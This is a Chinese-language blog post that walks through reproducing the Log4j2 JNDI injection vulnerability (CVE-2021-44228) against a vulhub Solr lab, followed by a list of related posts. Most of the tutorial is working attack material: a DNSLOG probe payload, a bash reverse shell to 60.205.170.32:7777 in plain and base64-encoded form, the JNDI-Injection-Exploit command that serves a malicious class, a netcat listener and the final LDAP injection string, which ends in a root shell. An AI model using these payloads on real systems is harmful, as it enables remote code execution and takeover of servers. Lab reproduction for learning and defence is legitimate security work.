log4j2 远程代码执行漏洞复现(CVE-2021-44228)

于 2024-08-01 21:21:39 发布
阅读量426 收藏 6
点赞数 10
文章标签: log4j 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76631050/article/details/140857651
版权

目录

一、相关概念

二、漏洞复现

步骤一:执行一下命令启动靶场环境并在浏览器访问!!!

1.启动命令

2.访问网址

步骤二:先在自己搭建的DNSLOG平台上获取一个域名来监视我们注入的效果...

步骤三:可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!

步骤四:开始反弹ShelI准备 INDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

#JDNI项目地址

# 反弹shell

#反弹Shell-base64加密

#命令模板

#最终Payload

步骤五:以上可以看到有三个服务,看到熟悉的rmi和ldap,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入..这里在注入之前另启动一个终端开启监听.

#服务器监听(别忘记关闭服务器防火墙)

步骤六:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址.…

步骤七:去另外一个监控终端看看shell有没有弹回来且用 whoami 命令查看权限,发现已经成功获取到root权限了。大功告成!

一、相关概念

  Apache Log4j:Apache的开源项目,一个功能强大的日志组件,提供方便的日志记录Apache Log4j2:对Log4j的升级,它比其前身Log4j1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Loqback架构中的一些问题。优秀的Java日志框架;Log4j2 漏洞受影响版本:2.0到2.14.1版本中存在一处JNDI注入漏洞

二、漏洞复现

步骤一:执行一下命令启动靶场环境并在浏览器访问!!!
1.启动命令

systemctl start docker

cd vulhub/log4j/CVE-2021-44228

docker-compose up -d

2.访问网址

步骤二:先在自己搭建的DNSLOG平台上获取一个域名来监视我们注入的效果...

步骤三:可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.8ebebc.dnslog.cn}

步骤四:开始反弹ShelI准备 INDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!
#JDNI项目地址

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

# 反弹shell
bash -i >& /dev/tcp/60.205.170.32/7777 0>&1

#反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMTcwLjMyLzc3NzcgMD4mMQ==
#命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的ypsip」
#最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMTcwLjMyLzc3NzcgMD4mMQ==}|{base64,-d}|bash" -A 60.205.170.32

步骤五:以上可以看到有三个服务,看到熟悉的rmi和ldap,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入..这里在注入之前另启动一个终端开启监听.
#服务器监听(别忘记关闭服务器防火墙)

nc -lvvp 7777

步骤六:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址.…
/solr/admin/cores?action=${jndi:ldap://60.205.170.32:1389/zmwqp0}

步骤七:去另外一个监控终端看看shell有没有弹回来且用 whoami 命令查看权限,发现已经成功获取到root权限了。大功告成!

Meet.meet
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Log4j2 远程代码执行漏洞CVE-2021-44228
qq_68163788的博客
06-18 1235
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
漏洞复现】2.Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现及分析
Zichel77的博客
03-21 1453
Apache 是当今世界上非常流行的跨平台Web服务端,有着良好的扩充性。而Log4j则是Apache的开源组件,用于日志管理,功能强大。Log4j来源于 Apache 软件基金会的日志服务项目,是一种Java日志框架,从最初Log4j1发展到现在的Log4j2,已经广泛应用于各行各业的业务开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞
log4j2远程代码执行漏洞CVE-2021-44228
流水不争先,争的是滔滔不绝
05-22 285
log4j2远程代码执行漏洞
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 640
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
探索PyCharm的单元测试世界:高效运行与调试指南
2401_85761003的博客
07-23 856
通过本文的介绍,你应该对如何在PyCharm中运行和调试单元测试有了全面的了解。掌握这些技能,你将能够更高效地编写和维护高质量的代码。记住,单元测试是软件开发过程中的重要组成部分,它有助于提高代码的可靠性和可维护性。注意:本文中的代码示例仅供参考,实际使用时请根据你的项目情况进行调整。如果你有任何问题或需要进一步的帮助,请随时联系我们。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
chromedriver-mac-x64_121.0.6167.184.zip
最新发布
07-31
chromedriver-mac-x64_121.0.6167.184.zip
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。.zip
07-31
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。
资源管理的艺术:使用MySQL用户资源配额优化性能
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
2024版国内外期刊最全信息库(6万多本期刊)(全新整理)
07-31
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/140405010 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 数据指标说明 【包含主要内容】 学科分类状态 期刊语言微信公众号定价邮发代码 期刊名称 电话出版区域邮箱 影响因子[知网]复合影响因子简介 主管部门 出版地址网址自引率[知网]综合影响因子 主办单位 主编 投稿网址国内统一刊号所属分区 是否TOP编辑部 官网微信号官网国际标准刊号地址 传真微信公号期刊等级邮编 是否OA期/掼賁浙鎳验刊状态 是否综述
chromedriver-mac-x64_120.0.6099.18.zip
07-31
chromedriver-mac-x64_120.0.6099.18.zip
chromedriver-mac-arm64_128.0.6562.0.zip
07-31
chromedriver-mac-arm64_128.0.6562.0.zip
目标可能存在Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)怎么修复
07-13
对于 Apache Log4j2 远程代码执行漏洞CVE-2021-44228),修复步骤如下: 1. 首先,确认你的应用程序是否使用了 Apache Log4j2。如果使用了,需要升级到修复了漏洞的版本。你可以查看 Apache Log4j2 的官方网站或者软件包管理工具获取最新版本的信息。 2. 如果升级不可行,你可以考虑使用以下两种临时解决方案之一: - 在应用程序的配置文件中,禁用 JNDI 查找功能,通过设置以下参数实现: ``` log4j2.formatMsgNoLookups=true ``` 这样可以禁用 JNDI 注入。 - 或者,通过设置系统属性来禁用 Log4j 的 JNDI 特性: ``` -Dlog4j2.formatMsgNoLookups=true ``` 这样可以在应用程序启动时禁用 JNDI 注入。 注意:这两种解决方案都是临时性的,建议尽快升级到修复版本。 3. 检查你的应用程序,确保没有直接或间接使用了受影响的 Log4j2 版本。如果有其他依赖库或框架使用了 Log4j2,需要确认它们是否已经更新到修复版本。 4. 定期检查和更新你的应用程序和依赖库。及时
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值